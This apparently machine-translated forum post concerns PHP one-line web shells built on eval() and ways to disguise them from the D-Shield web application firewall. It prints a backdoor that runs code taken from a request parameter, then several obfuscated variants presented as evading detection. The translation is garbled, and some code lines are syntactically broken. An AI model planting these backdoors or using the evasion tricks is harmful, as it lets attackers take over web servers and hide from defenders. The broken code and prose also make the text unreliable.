Part1
First we know that eval can execute PHP code, the most common PHP sentence is also using the Eval keyword.
<?php @eval($_get["Code"])?>
Part2
In the T00ls forum when mixed, there is a phenomenon, if someone to share the word, the use of eval in the keyword, many people will
Part3
Many cousins say this, mainly because the function of eval, in people's minds is a dangerous function, the basic WAF see the second kill that, but the truth is true??!
Part4
-Must be killed by a second sentence
<? PHP $a $_request [1]; Eval ($a);
D-Shield 4
-I think I can salvage a sentence.
<? PHP $a $_request [1]; Eval ($b=&$a// The value of the variable $ A is referenced to $b, so here a $ A and $b are equal.
Easy over D-Shield, take a picture.
-Comment a sentence
This callback function in a sentence, reported 1 levels, how to completely over D shield it
Finally, attach the code
<? PHP $a=call_user_func(function($u) {return @$_request[$u ];}, ' 1 '); Eval (/**/($a));
The relationship between Eval and PHP sentence